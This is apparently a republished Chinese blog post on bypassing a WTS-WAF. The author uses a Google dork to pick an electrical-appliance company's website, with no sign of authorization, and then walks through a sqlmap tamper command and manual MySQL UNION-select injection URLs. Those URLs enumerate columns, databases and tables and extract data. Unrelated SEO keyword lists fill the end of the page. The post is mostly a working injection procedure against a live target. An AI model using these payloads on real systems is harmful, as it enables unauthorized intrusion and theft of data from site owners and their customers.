如何进行绕过WTS-WAF的分析
发表于:2024-09-24 作者:千家信息网编辑
千家信息网最后更新 2024年09月24日,本篇文章为大家展示了如何进行绕过WTS-WAF的分析,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。0x01.寻找目标inurl:.php?id= intext
千家信息网最后更新 2024年09月24日如何进行绕过WTS-WAF的分析
本篇文章为大家展示了如何进行绕过WTS-WAF的分析,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。
0x01.寻找目标
inurl:.php?id= intext:电器
找到了一个电器公司的网站,随便测了测,发现有waf
这还不安排(找了点资料,貌似直接加号代替空格就可以,直接尝试)
0x02.操作
发现没有waf拦截了
资料还说了
sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py
工具我尝试了发现无法开始
就这样子......
0x03.手注
http://*/*.php?id=1+and+1=1 #回显正常http://*/*.php?id=1+and+1=2 #回显错误说明存在注入http://*/*.php?id=1+order+by+15 #15回显错误http://*/*.php?id=1+order+by+14 #14回显正常说明有14个字段http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 #-1让它错误然后执行后面
它回显了第2和第8
http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14 #查询当前数据库信息和当前用户一些常见的函数version() #显示数据库当前版本database() / schema() #显示当前数据库名user() / system_user() / session_user() / current_user() / current_user() #显示当前用户名称charset(str) #返回字符串str的字符集collation(str) #返回字符串str的字符排列方式
0x04.查数据
爆数据库
http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1
它不能group_concat,那我就一个一个查了!http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #从1开始取一个http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1 #从2开始取一个
爆数据表
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
爆数据
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1
总结:
1.工具跑不起就只能手注了
2.实践了下mysql的手注
上述内容就是如何进行绕过WTS-WAF的分析,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注行业资讯频道。
数据
字符
数据库
错误
分析
内容
字段
字符串
工具
技能
用户
电器
知识
资料
尝试
简明
简明扼要
信息
公司
函数
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
杭州云翔网络技术有限公司
mvc4 数据库操作
信用中国数据库回复退订
大兴品牌服务器回收价格行情
软件开发并列争求法的优缺点
公司人事管理数据库
荣昌2020网络安全
服务器IP地址安全策略
数据库怎么生成新表
该页面服务器不稳定什么原因
数据库空格转换
天津网络安全分论坛
phpcms数据库在哪里
仓库入库出库软件开发图标
中兴服务器调试是什么部门
服务器的串口重定向什么意思
网络安全技术层面特性
数据库一张表如何实现二级类目
松江区品牌软件开发代理价格
网络安全工程师工信部
rx3399软件开发指南
安全加固服务器
主播玩的斗罗大陆服务器叫什么
异速联服务器版
网络安全攻击相关的场景
自治网络安全管理条例
河北职业软件开发诚信企业
分布式数据库同步
电脑怎么重启重启服务器
电表网络安全